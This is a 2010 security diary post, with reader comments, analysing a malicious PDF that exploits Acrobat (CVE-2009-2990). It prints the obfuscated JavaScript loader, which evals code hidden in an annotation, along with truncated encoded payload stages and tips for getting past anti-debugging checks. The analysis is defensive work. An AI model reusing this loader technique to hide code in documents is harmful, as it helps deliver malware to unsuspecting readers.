Static analysis of malicous PDFs (Part #2)

Published: 2010-01-07
Last Updated: 2010-01-07 13:38:01 UTC
by Daniel Wesemann (Version: 1)
3 comment(s)

This sample came to us from ISC reader Joe, who reported that his Acrobat reader had crashed with the error message "A 3D parsing error has occurred". The obfuscation approach used by this sample isn't brand new, this type has been around since about mid December as far as we know. No matter, this ISC diary is not about breaking news, more about analysis technique.

$ md5sum bad.pdf
0045c97c4e9e44cac68bd85e197bfae2 bad.pdf
$ ls -al bad.pdf
-rw-r----- 1 daniel handlers 37275 2010-01-06 04:04 bad.pdf

This sample currently still stumps automated analysis tools like the usually excellent Wepawet, but this PDF is indeed malicious. Lets take a look, using Didier Stevens' pdf-parser.py as before.

$pdf-parser.py -a bad.pdf
Comment: 3
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 10
3: 7, 8, 10
/Action 1: 6
/Annot 2: 5, 9
/Catalog 1: 1
/Outlines 1: 2
/Page 1: 4
/Pages 1: 3

This document defines an "action" which triggers when the document is opened. The corresponding code is in Section 6 of this PDF. Looking at this section, we see that this is indeed a JavaScript block, but the actual code resides in section 7

$ pdf-parser.py -o 6 -f bad.pdf
obj 6 0
Type: /Action
Referencing: 7 0 R
[(2, '<<'), (2, '/Type'), (2, '/Action'), (2, '/S'), (2, '/JavaScript'), [...]

<<
/Type /Action
/S /JavaScript
/JS 7 0 R
>>


Continuing the quest, let's look at section 7:

$ pdf-parser.py -o 7 -f bad.pdf
obj 7 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '231'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>'), (1, 'rn')]

<<
/Length 231
/Filter /FlateDecode
>>

"var z; var y; n var h = 'edvoazcl'; nt z = y = app[h.replace(/[aviezjl]/g, '')]; nt var tmp = 'syncAEEotScan'; y = 0; t z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l )
;app[h.replace(/[czomdqs]/g, '')]( s);n s = ''; z = 1;"


That's more like it! Here we actually get JavaScript code ... and this code is probably the reason why some of the automated analyzers fail: This isn't simple JavaScript, it makes use of Adobe Acrobat specific JavaScript objects and methods to refer to the currently loaded document (app.doc), to identify any "annotations" within this document (syncAnnotScan), to access the first annotation (getAnnots), to assign it to a variable, and finally to eval (run) the code within this variable.  

When we ran pdf-parser.py -a above, it showed "/Annot 2: 5, 9", indicating two annotation sections, 5 and 9. This script accesses the first annotation, thus section 5. Looking into section 5, we see that it simply refers to section 8 .. and there, finally, we find the code block

$pdf-parser.py -o 8 -f bad.pdf

obj 8 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '8583'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>'), (1, 'rn')]

<<
/Length 8583
/Filter /FlateDecode
>>

'y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y64y64y6cy50y54y63y71y63y30y5fy43y67y28y76
y34y32y73y5fy36y34y2cy20y56y5fy5fy4ay53y33y32y29y7by76y61y72y20y71y41y69y5fy45y44y20y3
dy20y61y72y67y75y6dy65y6ey74y73y2ey63y61y6cy6cy65y65y3by76y61y72y20y54y38y5fy32y72y5
[...etc...]


Two more stages of decoding await the analyst here. First, we have to untangle the above (substitute y with %, then unescape). The resulting JavaScript code is still obfuscated:

function ddlPTcqc0_Cg(v42s_64, V__JS32){var qAi_ED = arguments.callee;var T8_2r_twoNOkI = 0;var
Fyaf2_8v_c7i = 512;qAi_ED = qAi_ED.toString();try {if (app){T8_2r_twoNOkI = 3;T8_2r_twoNOkI--;}}
catch(e) { }var ad_____M = new Array();if (v42s_64) { ad_____M = v42s_64;} else {var jVhSGHs = 0;
[...etc...]

Note how it makes use of "arguments.callee", an anti-debugging technique that we covered before. Also note how the code is again dependent on the presence of the "app" object... which is Adobe specific, and won't exist in Spidermonkey. But all you have to do to get past this stage in SpiderMonkey is to first define the app variable (set it to anything you like, app=1 works fine), and then to use your normal trick to get past the "arguments.callee" trap. I still like to use the copy of SpiderMonkey that I patched to print on every eval call.
 

Phew! Yes indeed. Considering the complexity of all this, it is probably no surprise that we are seeing such an increase of malware wrapped into PDFs ... and also no surprise that Anti-Virus tools are doing such a shoddy job at detecting these PDFs as malicious: It is darn hard. For now, AV tools tend to focus more on the outcome and try to catch the EXEs written to disk once the PDF exploit was successful. But given that more and more users no longer reboot their PC, and just basically put it into sleep mode between uses, the bad guys do not really need to strive for a persistent (on-disk) infection anymore. In-memory infection is perfectly "good enough" -  the average user certainly won't reboot his PC between leisure surfing and online banking sessions. Anti-Virus tools that miss the exploit but are hopeful to catch the EXE written to disk won't do much good anymore in the near future.
 

 

 

3 comment(s)

Comments

Thank you for posting your analysis of this PDF document. I have been analyzing PDFs for the last few months and had not yet discovered how 'app.doc', 'syncAnnotScan', and 'getAnnots' tied in. I will agree that Wepawet is a great tool, but I have also experienced it not detecting a malicious PDF due to obfuscation techniques. To mitigate this, I have started going back to basics: using a hex editor. :) I have also observed the regex search/replace of an arbitrary string in the FlatDecode stream. This seems to be a popular technique. Has anyone discovered the source of the JavaScript variable obfuscation? I'm wondering if that is related to Metasploit-related payload generation in some way.

I recently read Didier Stevens articles from Hakin9 magazine on malicious PDF analysis. Those, along with his PDF tools, are also great. Thanks again!
I didn't see this mentioned so I thought I'd post it, this vulnerability is CVE-2009-2990 and has been in use in the wild since early November.

Nice job guys.
You should really have a look at the Origami framework for PDF analysis. It does all sort of decoding, it is written in Ruby, plus it has a nice GUI:
http://security-labs.org/origami/

Diary Archives